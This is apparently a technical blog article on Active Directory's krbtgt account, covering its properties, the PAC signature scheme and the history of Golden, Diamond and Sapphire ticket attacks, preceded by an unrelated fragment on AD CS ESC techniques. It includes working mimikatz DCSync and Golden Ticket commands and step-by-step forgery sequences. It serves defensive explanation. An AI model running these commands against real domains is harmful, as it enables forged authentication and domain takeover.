The SID extension is on by default for any CA running an OS that has installed KB5014754 or later. The catch is what the *KDC* does with that extension. Switching the KDC to Full Enforcement breaks every certificate that lacks the SID extension, which is why Microsoft built the three-mode staged rollout: the §7 timeline anchors the compatibility window (mechanics and the Feb 11, 2025 / Sep 9, 2025 milestones), and the §9 Callout carries the verbatim KB5014754 dates and the customer compatibility-friction set (legacy SCEP, Intune PKCS, non-Microsoft PKI, third-party smart cards). ESC16 closes the loop in the other direction: an admin (or a compromised admin) can re-disable the extension at the CA level, recreating the weak-mapping condition KB5014754 was designed to close. Partially. The on-premises ESC catalog enumerates misconfigurations of the on-premises AD CS role. Entra Cloud PKI is a Microsoft-operated SaaS CA whose substrate is not the on-premises AD CS Windows role at all -- so ESCs that abuse on-premises CA registry flags (ESC6, ESC16), on-premises CA DACLs (ESC5, ESC7), or the on-premises transport (ESC8, ESC11) do not transfer directly. But Cloud PKI still issues authentication certificates, still has a template-equivalent administrative surface, and still maps certificates onto AD or Entra principals. The community has not yet published a Cloud PKI ESC catalog; the open question is whether the cross-product of Cloud PKI's primitive surface and its mapping behavior has its own equivalent class of named misconfigurations. No. A two-tier hierarchy improves protection of the *root* CA's private key (the root signs only the subordinate's certificate and stays offline) but does nothing for the subordinate. The ESC catalog attacks the issuing subordinate, not the root. The misconfigured Enrollee-Supplies-Subject template, the editable `EDITF_ATTRIBUTESUBJECTALTNAME2` registry flag, the per-template DACL, the NTLM-relayable Web Enrollment endpoint -- all live on the subordinate CA. A two-tier hierarchy is the right architecture and is essentially orthogonal to the ESC discussion. No. Smart cards are *consumers* of certificates issued by AD CS; the smart-card pipeline reads a certificate off the card, presents it to PKINIT, and receives a TGT. AD CS is the *issuing* substrate. Every ESC attacks the issuance side. A smart-card deployment depends on AD CS being correctly configured; it adds no defense against ESC1 through ESC16 and may add complexity in the strong-mapping migration (smart-card-issued certificates may use legacy mappings that break under Full Enforcement). No. BloodHound CE does not ship a numbered `ADCSESC8` edge. It ships `CoerceAndRelayNTLMToADCS`, an edge representing "a computer can be SMB-coerced to authenticate to an attacker host, and the attacker host can relay that authentication to an ESC8-vulnerable Web Enrollment endpoint on a CA" [@bh-coerce-adcs-edge]. Look for that edge, not for a numbered ESC8 edge. If `CoerceAndRelayNTLMToADCS` paths exist anywhere in the graph, your Web Enrollment endpoint is ESC8-exposed and the operator chain from any coercible computer to a Domain Admin authenticator runs in eight minutes. ESC12 is treated in the §5 Aside: Knobloch's October 2023 YubiHSM hardware-substrate disclosure (earliest Wayback snapshot dated October 24, 2023), scoped out of the body because the abuse depends on the specific HSM vendor and on shell access to the CA host [@knobloch-esc12] [@knobloch-esc12-archive]. ESC0 does not exist in the SpecterOps catalog; some operator blogs use "ESC0" informally to describe naive enumeration (no abuse, just "the CA is reachable and the template store is readable") but it is not a community-named technique.

KRBTGT: The Account That Owns Active Directory

noreply@paragmali.com (Parag Mali) — Sat, 23 May 2026 00:00:00 GMT

Active Directory's `krbtgt` account is the one secret in any Windows domain whose disclosure forges valid Ticket-Granting Tickets for every principal -- including ones that do not exist. Twelve years of attacks (Golden, Diamond, Sapphire) and Microsoft's responses (the MS14-068 patch, KrbtgtFullPacSignature, the two-reset rotation procedure) converge on one fact: krbtgt rotation invalidates forged TGTs but does not recover the systemic compromise that produced them. That distinction is why confirmed krbtgt compromise is a forest-rebuild event in modern incident-response playbooks, not a key-rotation event.

1. Ninety Seconds to Domain Admin

A single mimikatz kerberos::golden command, with the krbtgt account's AES-256 long-term key in hand, walks the attacker onto any resource in the domain as Administrator. No Domain Admin password was reset. No Domain Admin account was created. No SACL on a sensitive object fired. No LSASS on any host was dumped. No signature-based IDS rule triggered. The attacker holds exactly one cryptographic key -- the long-term key of the RID-502 service account named krbtgt -- and the entire Kerberos trust hierarchy of the domain now accepts whatever they sign [@mitre-t1558001]. The section title's "ninety seconds" is an illustration of how fast the attack is on the wall clock, not a measured demonstration from a published primary.

The operator sequence is short enough to quote. Earlier in the engagement, the attacker ran lsadump::dcsync /user:contoso\krbtgt from a member-server foothold and walked off with the krbtgt long-term key material [@mimikatz]. Then they switched tools to forge a ticket from scratch:

mimikatz # kerberos::golden /domain:contoso.local
                            /sid:S-1-5-21-1004336348-1177238915-682003330
                            /aes256:<key>
                            /user:Administrator /id:500
                            /groups:512,513,518,519,520 /ptt

That single command, documented by Sean Metcalf for operators in 2015 [@adsec-1640], does the forgery in process memory, injects the ticket into the local Kerberos cache (/ptt = pass-the-ticket), and lets the next dir \\dc01\admin succeed.

Count the controls that did not fire while the forged ticket was being minted and presented. No Domain Admin password reset, because the attacker never used a Domain Admin password. No new privileged account, because the attacker impersonated an existing one (RID 500). No SACL on a sensitive object, because the ticket was already approved by the Kerberos trust root before any object was touched. No LSASS dump on a writeable DC, because DCSync is a replication API call, not a memory scrape [@mitre-t1003006]. No IDS hit on a known-malicious payload, because Mimikatz lives in attacker process memory and the wire traffic is, structurally, a TGS-REQ. No anomalous logon time, MFA prompt, or Conditional Access decision, because Kerberos pre-authentication is satisfied by holding a valid TGT and the TGT was minted offline.

The article's load-bearing thesis: within the Kerberos trust root of a single domain, the krbtgt key is the unique secret whose disclosure yields valid TGTs for every principal -- including ones that do not exist. The technical recovery (two-reset rotation) is well-documented [@ms-forest-recovery] and does cryptographically invalidate forged tickets. But the operational recovery from a confirmed krbtgt compromise is a forest-rebuild event for reasons that have nothing to do with the krbtgt key itself.

This produces an apparent contradiction. Microsoft documents a clean two-reset rotation procedure with a ten-hour interval [@ms-forest-recovery]; Mandiant- and SpecterOps-style incident-response playbooks treat confirmed krbtgt compromise as a forest-rebuild event [@specterops-dot2]. Both statements are simultaneously true. The job of the next ten thousand words is to explain why -- starting with what krbtgt actually is. Not the key. Not the protocol. The account itself: RID 502, disabled, indelible.

2. The Account: RID 502, Disabled, Indelible

Open Active Directory Users and Computers on a fresh Windows Server 2022 domain promoted ten seconds ago. In the Users container there is an account called krbtgt. It has no password visible to the admin. It is disabled. Try to enable it -- the checkbox accepts the click, but the next replication cycle puts the account right back into the disabled state. Try to rename it -- the operation appears to succeed, but the objectSID does not change. Try to delete it -- the operation fails outright. You cannot log in as it; the disabled-for-interactive-logon property is enforced inside the Security Accounts Manager. The account exists exactly because the domain exists; the lifetime of the account and the lifetime of the domain are the same lifetime [@ms-default-accounts].

Why does Active Directory ship with an account that no admin can use, no attacker can authenticate as interactively, and no operator can remove?

The Kerberos Ticket-Granting Ticket service account that exists, exactly once per Active Directory domain, to hold the long-term cryptographic key the domain controllers use to encrypt and sign every TGT issued in the domain. The account name itself is the Kerberos principal name (`krbtgt/DOMAIN@DOMAIN`) inherited from MIT's 1988 Kerberos v4 design.

Creation. The account is created automatically when the first writeable domain controller is promoted in a new domain. The Microsoft Learn default-accounts page lists it alongside Administrator and Guest as one of the three default local accounts in the Users container, with the verbatim note that "the KRBTGT account can't be enabled in Active Directory" [@ms-default-accounts]. The account's lifecycle is bound to the domain's lifecycle; there is no operator-controllable provisioning of a krbtgt account, and no de-provisioning short of demoting the domain.

RID 502. The relative identifier at the tail of the account's SID (S-1-5-21-<domain>-502) is fixed by the well-known SID specification [@ms-sids]. Sean Metcalf's operator primer confirms the RID-502 binding directly: "Each Active Directory domain has an associated KRBTGT account ... The SID for the KRBTGT account is S-1-5-<domain>-502" [@adsec-483].RIDs 500 through 1000 are reserved for built-in security principals; 500 is Administrator, 501 is Guest, 502 is krbtgt. Renaming the sAMAccountName cannot move the RID. The KDC service derives its key lookups from the principal name, which binds to the RID, not from the friendly name shown in ADUC. Renaming krbtgt as a defensive measure is a fallacy that the next section will sharpen further.

Each Read-Only Domain Controller has its own krbtgt_<rid> account whose key signs only that RODC's tickets. The full-domain krbtgt account is read-only from the RODC's perspective -- the design property that lets RODCs participate in Kerberos without holding the full-domain trust root [@adsec-483].

Container. CN=Users,DC=<domain>. The standard Users container, not a Tier-0 OU or a Protected Users group. The account is privileged by virtue of its RID, not by virtue of its containership. Moving it into a different container does not change its semantic role to the KDC.

Disabled for interactive logon. Documented verbatim on the Microsoft Learn default-accounts page: "The KRBTGT account can't be enabled in Active Directory" [@ms-default-accounts]. The account is reserved for the KDC service. There is no interactive logon surface attached, no LSA logon-rights grant, no Kerberos pre-authentication path that produces a TGT for the krbtgt account itself. The account exists to provide a key, not to authenticate.

Indelible and unrenamable. Also from the same Microsoft Learn page: "This account can't be deleted, and the account name can't be changed" [@ms-default-accounts]. ADUC will show a renamed display, but the underlying object identity (the RID, the principal name) is fixed by the directory schema and by LsaSrv enforcement on the writeable DCs.

Password. System-generated, unknown to operators by design. Resetting it via ADUC produces a value Active Directory immediately replaces with a fresh system-generated value. The mechanism that produces the current key is therefore not operator-controllable; rotation is the only primitive operators have over the key value [@ms-forest-recovery].

Password history equals 2. Documented verbatim on the AD Forest Recovery page: "The password history value for the krbtgt account is 2, meaning it includes the two most recent passwords" [@ms-forest-recovery]. This is the mechanical foundation for the two-reset procedure Section 7 will dissect. The KDC keeps both a current and a previous key in the krbtgt account; in-flight TGT validation tries both during the brief window after a rotation; one reset retires only the older of the two; a second reset, separated by at least the maximum ticket lifetime, evicts the key the attacker held.

Where the key lives. The KDC service (kdcsvc.dll) on every writeable DC reads the krbtgt long-term key from ntds.dit at startup and holds it in process memory for ticket signing and validation. Credential Guard's VBS trustlet -- LSAISO -- does not isolate this read on writeable DCs by design: a DC must read the key to issue tickets [@ms-credential-guard] (see also §10 Aside on why Credential Guard skips the DC). This is the structural asymmetry that makes the krbtgt key reachable to any attacker who can compromise a writeable DC (or invoke its replication API remotely), even on a system where Credential Guard is otherwise enforced everywhere else.

We know what the account is now: a non-interactive, indelible, RID-502 service principal with a system-generated, two-slot password history. But the account is just the container. The rest of the article cares about the long-term cryptographic key it holds.

3. The Key: What RFC 4120 and [MS-KILE] Specify

Hand a network capture of a Kerberos AS-REP to a Wireshark dissector. The dissector shows the TGT as a sequence of ASN.1 fields. One field is named enc-part and its content is opaque. The dissector knows the format of what is inside that opaque blob -- an EncTicketPart -- but it cannot show the field values because the blob is encrypted [@rfc4120]. Encrypted under what? Under one key: the long-term key of the principal named krbtgt/CONTOSO.LOCAL@CONTOSO.LOCAL.

The Microsoft specification puts it as plainly as is possible to put it. [MS-KILE] specifies that the KDC encrypts every ticket using the long-term cryptographic key of the krbtgt principal, citing RFC 4120 §5.2.2 [@mskile]. That sentence, more than any other in the Microsoft Open Specifications corpus, is the cryptographic foundation of Active Directory authentication. Every TGT issued by every writeable DC in the domain is encrypted under one key. There is no per-account key, no per-DC key, no rolling subkey. One key, one trust scope.

The credential the Kerberos Key Distribution Center issues at logon, encrypted under the KDC's own service key (in Windows, the krbtgt account's long-term key), that the client subsequently presents to request service tickets without re-authenticating with a password. RFC 4120 §5.3 defines its fields; [MS-KILE] specifies the Windows wire profile [@rfc4120][@mskile]. The Kerberos service that issues TGTs (the Authentication Service) and exchanges TGTs for service tickets (the Ticket-Granting Service). In Active Directory the KDC runs as `kdcsvc.dll` on every writeable domain controller; it holds the krbtgt long-term key in process memory for the lifetime of the service [@rfc4120].

Inside the encrypted blob

RFC 4120 §5.3 specifies the fields of the EncTicketPart: a session key the KDC generates for this TGT, the client's name, the cross-domain transit path, the timestamps (authtime, starttime, endtime, renew-till), the optional client-address list, and a final field of authorization-data that Windows uses to carry the Privilege Attribute Certificate [@rfc4120].

The Windows-specific data structure embedded inside the `authorization-data` field of every Kerberos ticket. The PAC carries the user's SID, the SIDs of every group the user belongs to, account restrictions, profile path, logon server, and a small set of cryptographic signatures the KDC computes to bind the structure to the ticket. Defined in [MS-PAC] [@mspac].

The PAC is where the load-bearing security claim of Windows Kerberos lives. RFC 4120 itself does not care about groups; it cares about whether the client can prove identity to a server. The PAC carries the authorization layer Windows needs on top of authentication: which security principal the ticket represents, which groups confer which permissions, which restrictions apply [@mspac]. The first thing a Windows file server does when it receives a service ticket is decode the PAC, read the SIDs, and run the access-check algorithm.

The three signatures inside every PAC

The PAC is integrity-protected by a small set of signatures the KDC computes when it issues the ticket. As of the [MS-PAC] revision 26.0 dated June 10, 2024 [@mspac], a TGT-resident PAC carries three of them:

The PAC server signature. A keyed HMAC computed under the service key. For a TGT the service is krbtgt/DOMAIN, so the server signature is computed under the krbtgt long-term key. For a service ticket the server signature is computed under the service account's long-term key (the file server's machine-account key, for example) [@mspac].
The PAC KDC signature. A keyed HMAC computed under the krbtgt long-term key, signing the bytes of the server signature. This is the pre-2022 anchor of PAC integrity: even if a service holding only its own key could verify the server signature, only the KDC (or anyone holding the krbtgt key) could compute the matching KDC signature. The "pre-2022" framing tracks the deployment of KB5020805's Full PAC Signature, documented in §5 Generation 6 [@kb5020805].
The Full PAC Signature. Added by Microsoft's response to CVE-2022-37967, deployed via KB5020805 starting November 8, 2022 and enforced by default since July 11, 2023 [@kb5020805][@cve-2022-37967]. Computed by the KDC over the entire PAC -- including the older two signatures -- and stored alongside them. Also computed under the krbtgt long-term key.

flowchart TD PAC[PAC contents: SIDs, groups, restrictions] --> SSig[Server Signature] PAC --> KSig[KDC Signature] PAC --> FSig[Full PAC Signature] SSig --> KEY["krbtgt long-term key (TGT)"] KSig --> KEY FSig --> KEY KEY --> TGT[EncTicketPart for TGT] TGT --> WIRE[AS-REP / TGS-REP on the wire]

This is the architectural fact the rest of the article will refer back to. The addition of the Full PAC Signature did not relocate the trust to a different key. All three PAC signatures on a TGT terminate at the krbtgt long-term key. An attacker who holds the krbtgt key computes all three correctly in the same step. This is the precise technical observation that motivates the Section 5 attack cascade and the Section 7 rotation analysis.

The enctype matrix

The krbtgt account does not hold a single key; it holds a set of keys, one per Kerberos encryption type advertised in msDS-SupportedEncryptionTypes on the account object. RFC 4120 §5.2.9 defines the enctype numbers; common Windows values are AES-256-CTS-HMAC-SHA1-96 (enctype 18), AES-128 (enctype 17), and the legacy RC4-HMAC (enctype 23) [@rfc4120]. AES-256 has been the recommended default for newly-provisioned krbtgt accounts since the Windows Server 2008 R2 / Windows Server 2012 functional levels, though early Windows Server 2008 deployments often required a krbtgt password reset to materialise the AES keys. The post-2017 AES-SHA2 family (enctypes 19 and 20) is defined by IETF but not deployed in mainline Windows production as of [MS-KILE] revision 47.0 dated April 27, 2026 [@mskile].

A numeric identifier for the cryptographic algorithm and key length used to encrypt a Kerberos message. RFC 4120 §5.2.9 enumerates them; common Windows values are 17 (AES-128), 18 (AES-256), and 23 (the legacy RC4-HMAC). Each principal's long-term key is derived per enctype, so the krbtgt account stores multiple key derivations side by side [@rfc4120].

Each derivation is stored in both current and previous slots; rotating the krbtgt password rederives the entire set for the new password and shifts the previous derivations into the previous slot.

FAST armoring sits next to, not above, the krbtgt key

RFC 6113 / [MS-KILE] Flexible Authentication Secure Tunneling adds a second key layer for the client-facing pre-authentication exchange, armoring the AS-REQ under a separate channel key derived from a TGT the client already holds. FAST hardens pre-authentication against offline brute-force. It does not change the fact that the TGT's enc-part is encrypted under the krbtgt key on its way back to the client [@mskile]. No Kerberos extension shipped through 2026 moves the TGT's trust anchor anywhere other than the krbtgt long-term key.

Within a Kerberos domain, every TGT reduces to the same key, and that key has a name: krbtgt.

That sentence is the load-bearing claim the rest of the article rests on. The next section explains how a 1988 academic design decision became the cryptographic foundation of every Windows domain alive today.

{` // Simplified model of the three PAC signatures on a TGT. // Each signature is a keyed HMAC computed under the krbtgt long-term key. const pacContents = "SIDs, groups, restrictions"; const krbtgtKey = "<32-byte AES-256 long-term key>";

function hmac(key, data) { return key === krbtgtKey ? "SIG(" + data + ")" // attacker-with-key computes valid sigs : "INVALID"; // attacker-without-key cannot forge them }

function buildPACBlock(attackerKey) { const serverSig = hmac(attackerKey, pacContents); const kdcSig = hmac(attackerKey, serverSig); const fullPAC = hmac(attackerKey, pacContents + serverSig + kdcSig); const validates = [serverSig, kdcSig, fullPAC].every(s => s !== "INVALID"); return { serverSig, kdcSig, fullPAC, validates }; }

console.log("with krbtgt key :", buildPACBlock(krbtgtKey).validates); console.log("without krbtgt key:", buildPACBlock("guess-key").validates); `}

4. Origins: 1988 Athena, RFC 4120, [MS-KILE]

Open the bibliography of RFC 4120 and find an entry tagged [Ste88]: "Steiner, J., Neuman, C., and J. Schiller, 'Kerberos: An Authentication Service for Open Network Systems,' USENIX Conference Proceedings, February 1988" [@rfc4120]. The principal name krbtgt is in that paper. It has been carried forward unchanged through RFC 1510 (1993) [@rfc1510], through Active Directory's February 2000 release, through RFC 4120 (2005) [@rfc4120], through the first [MS-KILE] revision (2007), and into the current [MS-KILE] revision 47.0 dated April 27, 2026 [@mskile]. Thirty-eight years.

What did the 1988 design decision look like, and what has changed about its security properties since?

MIT Project Athena, 1983-1991

Project Athena ran at MIT from 1983 to 1991 as a campus-scale distributed-computing experiment funded primarily by IBM and DEC [@project-athena]. The authentication problem Athena needed to solve was the one every multi-user network has needed to solve since: how do you let thousands of workstations talk to thousands of services without broadcasting cleartext passwords on every connection? Steiner, Neuman, and Schiller presented their answer at the Winter USENIX conference in Dallas in February 1988. Their design introduced the krbtgt principal name and the trust property that one key encrypts every TGT in the Kerberos domain [@athena1988].

The principal name krbtgt predates Active Directory by twelve years. MIT's 1988 USENIX paper used the name, RFC 1510 standardised it in 1993 [@rfc1510], and Windows 2000 inherited it unchanged. There is no Microsoft-specific Kerberos principal naming convention; the convention is IETF.

The design property that one key encrypts every TGT was not framed in 1988 as a security risk. It was framed as a simplification: by giving the TGS one stable identity that issues every TGT, the protocol does not need to negotiate per-session KDC identities or per-server validation paths. The protocol reduces, mathematically, to two questions: did the KDC issue this TGT, and did the TGT permit the subsequent TGS-REQ for this service? Both reduce to "does this signature validate under the krbtgt key?"

From RFC 1510 to [MS-KILE]

John Kohl and Clifford Neuman published RFC 1510 in September 1993, standardising Kerberos version 5 [@rfc1510]. The krbtgt/DOMAIN@DOMAIN principal-name convention carried forward unchanged from Athena. RFC 1510 is the document Microsoft engineers read when they chose Kerberos v5 as the Windows 2000 default authentication protocol; the krbtgt account became part of the AD schema at the Windows 2000 ship date (RTM December 15, 1999; general availability February 17, 2000) [@windows-2000]. The Microsoft Learn default-accounts page binds the two specifications to the same account: "KRBTGT is also the security principal name used by the KDC for a Windows Server domain, as specified by RFC 4120" [@ms-default-accounts].

RFC 4120, published in July 2005 by Neuman, Yu, Hartman, and Raeburn, obsoleted RFC 1510 [@rfc4120]. The principal name carried forward unchanged again. Section 5.3 defines the wire format of a ticket; §6.2 defines the principal-name convention. Microsoft Open Specifications then published the first [MS-KILE] revision in March 2007, documenting the Windows wire profile on top of RFC 4120. The current revision -- 47.0, dated April 27, 2026 -- still says the same thing: the krbtgt long-term key encrypts every TGT [@mskile]. The Microsoft overlay on top of the IETF specification is the AD-account-management surface: RID 502 fixed, password system-generated, password-history-of-2, disabled-for-interactive-logon, automatic provisioning at first-DC promotion [@ms-default-accounts][@ms-forest-recovery].

Every Kerberos domain on the public Internet today has a krbtgt principal in it. The name has not moved in thirty-eight years. Only the AD-specific overlay is what gives this article its Windows-specific subject; the protocol substrate is older than the attack surface by twenty-six years.

The principal name and the trust property are nearly forty years old. The exploit chain that targets them is twelve. The interesting question is what happened in the twelve years that turned an academic design decision into the most consequential single key in enterprise computing. That story has a beginning at Black Hat USA on August 7, 2014.

5. The Attack Cascade, 2014 to 2024

Six generations of attack span ten years. None of them found a way to forge a TGT without the krbtgt key; the search space is mathematically closed in that direction. What they did instead is get progressively better at hiding the forgery inside genuine-looking wire traffic. By 2022, the forgery and the legitimate TGT are wire-indistinguishable. Here is how that arc unfolded.

gantt title Attack and defence generations dateFormat YYYY-MM-DD axisFormat %Y section Attack Gen 0 Academic baseline :done, g0, 2000-02-01, 2014-08-05 Gen 1 MS14-068 PAC forgery :crit, g1, 2014-11-18, 90d Gen 2 Golden Ticket :crit, g2, 2014-08-07, 2920d Gen 3 Silver Ticket : g3, 2015-01-01, 4000d Gen 4 Diamond Ticket :crit, g4, 2022-06-21, 1700d Gen 5 Sapphire Ticket :crit, g5, 2022-10-15, 1300d section Defence MS14-068 patch :done, d1, 2014-11-18, 30d MDI alert family :done, d2, 2016-01-01, 800d Full PAC Signature audit :done, d3, 2022-12-13, 210d Full PAC Signature enforce :done, d4, 2023-07-11, 90d Compatibility removed :done, d5, 2023-10-10, 30d

Generation 0 (pre-November 2014): the academic baseline

Two assumptions held for fourteen years between Windows 2000 RTM and Black Hat USA 2014. First, the PAC's two signatures -- the Server Signature and the KDC Signature -- were treated as adequate; the [MS-PAC] specification required the KDC Signature to be a keyed HMAC under the krbtgt key, but Windows KDCs in practice accepted weaker non-keyed checksums on it (CRC32, RSA-MD5) [@mspac][@ms14068]. Second, the long-term krbtgt key was held only on writeable DCs and was considered unreachable to remote attackers because no remote primitive existed to extract it. Both assumptions failed within months of each other. The MS14-068 disclosure broke the first; the productionised DCSync primitive in Mimikatz broke the second.

Generation 1 (November 18, 2014): MS14-068 and CVE-2014-6324

On November 18, 2014, Microsoft published security bulletin MS14-068, "Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780)" [@ms14068]. The disclosure: the KDC validated PACs using a checksum algorithm that did not actually depend on the krbtgt key. Any authenticated domain user could forge a PAC asserting Domain Admin group membership, attach it to an otherwise-valid AS-REQ exchange, and the KDC would accept the forgery. The NVD entry for CVE-2014-6324 records that the bug "allows remote authenticated domain users to obtain domain administrator privileges via a forged signature in a ticket, as exploited in the wild in November 2014, aka 'Kerberos Checksum Vulnerability'" [@cve-2014-6324]. CVSS 9.0. Critical for every supported Windows Server SKU. Exploited in the wild within hours of the bulletin.

Discovery credit for MS14-068 appears across Metasploit module authorship, AttackerKB, and several practitioner write-ups as Tom Maddock. The MSRC bulletin verbatim says only "privately reported" and does not name the reporter publicly [@ms14068]. The Maddock attribution is folk knowledge; the MSRC primary does not confirm it.

Microsoft's patch replaced the weak checksum with a real keyed HMAC under the krbtgt key, the same construction the [MS-PAC] document specifies today. The patch was correct: it restored PAC integrity to actual dependence on a real secret. It also, as a side-effect, elevated the krbtgt key from "an important secret in the directory" to "the load-bearing secret of every authentication decision in the domain." From November 18, 2014 onward, an attacker who held the krbtgt key did not just hold a useful credential; the attacker held the only credential the KDC could not check above.

Key idea: The MS14-068 patch was correct -- it restored PAC integrity to dependence on the krbtgt key. Its side-effect was to elevate the krbtgt key from "important" to "load-bearing for every authentication decision in the domain." From November 18, 2014 onward, the krbtgt key was the single secret worth attacking directly.

Generation 2 (August 7, 2014): Golden Ticket

Skip Duckwall and Benjamin Delpy presented "Abusing Microsoft Kerberos: Sorry you guys don't get it" at Black Hat USA on August 7, 2014 [@infocondb-bh2014]. The technique they demonstrated is what Sean Metcalf later popularised as the Golden Ticket: with the krbtgt key in hand, an attacker forges a TGT from scratch for any principal SID with any group memberships [@adsec-1640]. The KDC validates the TGT by decrypting enc-part with the krbtgt key. There is no upstream authority to check, because krbtgt is the authority. MITRE T1558.001 codifies the technique [@mitre-t1558001]; Benjamin Delpy's Mimikatz kerberos::golden command operationalises it [@mimikatz].

sequenceDiagram participant A as Attacker (holds krbtgt key) participant L as Local Kerberos cache participant K as KDC on a DC participant S as Target service A->>A: Choose target SID and groups A->>A: Build EncTicketPart locally A->>A: HMAC PAC signatures under krbtgt key A->>A: AES-encrypt enc-part under krbtgt key A->>L: kerberos::ptt -- inject ticket L->>K: TGS-REQ presenting forged TGT K->>K: Decrypt TGT with krbtgt key -- valid K->>L: TGS-REP for target service L->>S: Present service ticket -- access granted

The Golden Ticket works because of the single-key trust property the 1988 design chose. There is nothing in the protocol that asks "is this TGT in the KDC's issuance log?" The TGT is self-verifying. If it decrypts and its signatures validate under the key, it is, by definition, a TGT.

Why, then, does Golden Ticket sometimes get caught? Because the default Mimikatz invocation leaves four observable artefacts that Microsoft Defender for Identity ships dedicated alerts for, under the umbrella of the Suspected-Golden-Ticket alert family [@mdi-classic][@mdi-credential]. Mimikatz historically defaulted to RC4-HMAC encryption (enctype 23), which is anomalous on a modern AD where AES is standard. Mimikatz historically defaulted to a ten-year ticket lifetime, against the AD MaxTicketAge default of ten hours. The attacker frequently asserts groups the user does not actually hold, which produces a "forged authorization data" anomaly. And the attacker sometimes forges a ticket for an account that does not exist in the directory at all, which produces a "nonexistent account" anomaly. Microsoft's live MDI alerts page enumerates six External IDs in the family: 2009 (encryption downgrade), 2013 (forged authorization data), 2022 (time anomaly), 2027 (nonexistent account), 2032 (ticket anomaly), and 2040 (ticket anomaly using RBCD) [@mdi-classic].

The structural observation: every alert in this family detects symptoms of forging from scratch. None of them detects the primitive of holding the krbtgt key. That distinction is what makes Generation 4 (Diamond) and Generation 5 (Sapphire) interesting.

Generation 3 (parallel path): Silver Ticket

Silver Tickets forge a service ticket (TGS) under a captured service-account key. They sidestep the krbtgt key entirely; the KDC is never involved in the forgery, and the forgery validates only against the one service whose key was captured. MITRE T1558.002 catalogues the technique [@mitre-t1558002]. Mentioned here so the question stops being asked. Silver Tickets are a sibling technique that targets a different trust root (per-service account keys), not the krbtgt key.

Generation 4 (June 2022): Diamond Ticket

In June 2022, Andrew Schwartz at TrustedSec and Charlie Clark at Semperis co-published "A Diamond in the Ruff," documenting a refinement of Golden Ticket that defeats every PAC-content anomaly detection in one stroke [@trustedsec-diamond][@semperis-diamond]. The technique: instead of forging the TGT from scratch, the attacker requests a real TGT from the KDC, then decrypts its enc-part using the held krbtgt key, modifies the PAC contents, re-signs the PAC under the krbtgt key, re-encrypts the enc-part, and walks away with a ticket whose every wire property -- sname, cname, authtime skew matching the real KDC's clock, plausible endtime, AES-256 envelope -- looks like a legitimate KDC-issued artefact.

sequenceDiagram participant A as Attacker (low-priv user, holds krbtgt key) participant K as KDC on a DC participant L as Local Kerberos cache participant S as Target service A->>K: AS-REQ for low-priv user K->>A: Real TGT, encrypted under krbtgt key A->>A: Decrypt enc-part with held krbtgt key A->>A: Modify PAC SIDs to Domain Admins A->>A: Recompute PAC signatures under krbtgt key A->>A: Re-encrypt enc-part under krbtgt key A->>L: ptt -- inject modified TGT L->>K: TGS-REQ presenting Diamond TGT K->>K: Decrypt -- valid, signatures match K->>L: TGS-REP for target service L->>S: Access granted as Domain Admin

Every MDI Suspected-Golden-Ticket detection disappears, by construction. The encryption type is AES-256 because the KDC issued it that way. The lifetime matches the AD policy because the KDC set it that way. The cname matches a real account because the attacker requested the TGT as a real low-privilege account they own. The only thing the attacker changed is the group SIDs inside the PAC, and the PAC signatures revalidate because the attacker recomputed them under the same krbtgt key the KDC would have used.

TrustedSec verbatim: Diamond "would almost certainly require access to the AES256 key" [@trustedsec-diamond]. The KDC issued the real TGT in AES-256, so the attacker needs the AES-256 key to decrypt and re-encrypt -- not just the RC4 NTLM hash that the classic Golden Ticket can use.

The Diamond Ticket disclosure pointed at an architectural problem: with the krbtgt key in hand, every PAC-content anomaly detection is defeated. Microsoft's structural answer was the Full PAC Signature in November 2022. We come to that in Generation 6.

Generation 5 (October 2022): Sapphire Ticket

Charlie Bromberg, who publishes under the handle Shutdown (@_nwodtuhs) at Synacktiv and maintains The Hacker Recipes wiki, disclosed Sapphire Ticket in October 2022 [@hackrecipes-sapphire][@shutdownrepo-sapphire]. Where Diamond modifies the PAC, Sapphire splices the PAC. The procedure abuses two Kerberos extensions in combination -- Service-for-User-to-Self (S4U2self) and User-to-User (U2U) -- to coerce the KDC into issuing a service ticket whose embedded PAC describes a target user the attacker wishes to impersonate. The attacker then extracts that genuine PAC from the service ticket and embeds it, unchanged, in a freshly constructed TGT signed under the held krbtgt key.

A Kerberos extension that lets a service request a ticket *to itself*, on behalf of another user, without that user presenting credentials. Originally designed for protocol-transition scenarios (a web service accepting forms-based auth and translating it to Kerberos for downstream calls). Defined in [MS-SFU] (Kerberos Protocol Extensions: Service for User and Constrained Delegation Protocol); referenced from [MS-KILE] [@mssfu]. A Kerberos extension defined in RFC 4120 §3.7 that allows a ticket to be encrypted under the recipient's session key rather than its long-term key, enabling two clients to authenticate to each other without either being a KDC-registered service [@rfc4120]. sequenceDiagram participant A as Attacker (low-priv user, holds krbtgt key) participant K as KDC on a DC participant L as Local Kerberos cache participant S as Target service A->>K: AS-REQ for low-priv user K->>A: Real attacker TGT A->>K: S4U2self + U2U TGS-REQ for target user K->>A: TGS containing target user's genuine PAC A->>A: Extract genuine PAC from TGS A->>A: Build new TGT, embed genuine PAC A->>A: Sign three PAC signatures under krbtgt key A->>A: Encrypt enc-part under krbtgt key A->>L: ptt -- inject Sapphire TGT L->>K: TGS-REQ presenting Sapphire TGT K->>K: Decrypt -- valid, PAC is genuine K->>L: TGS-REP for target service L->>S: Access granted as target user

By construction, there is no PAC-content anomaly to detect: the PAC inside the resulting TGT is literally a PAC the KDC issued for the target user, because the KDC did issue it. The PAC's three signatures revalidate because the attacker held the krbtgt key to sign them; if Microsoft validates the Full PAC Signature on incoming tickets, that signature also validates because the attacker computed it under the same krbtgt key. Detection must move to traffic-flow analysis -- specifically, the anomalous S4U2self plus U2U TGS-REQ sequence on the wire -- and as of May 2026 no vendor has shipped a clean canonical default-enabled analytic for that signal [@unit42-gemstones].

The Sapphire Ticket disclosure is widely misattributed to Charlie Clark (Semperis). The primary tooling artefact -- the Impacket PR #1411 conversation thread -- addresses the author as @ShutdownRepo, who is Charlie Bromberg of Synacktiv [@impacket-1411]. The Hacker Recipes wiki and pgj11.com both confirm Bromberg as the author of record [@hackrecipes-sapphire][@pgj11]. The misattribution conflates Sapphire with Clark's separate "AS Requested Service Tickets" technique.

The empirical artefact is the Impacket pull request #1411, in which Bromberg added the -impersonate flag to ticketer.py to put the tool into "sapphire ticket mode" [@impacket-1411][@shutdownrepo-sapphire]. Palo Alto Unit 42's "Precious Gemstones" survey is the vendor-side state-of-the-art summary [@unit42-gemstones].

Generation 6 (November 2022 to October 2023): KrbtgtFullPacSignature

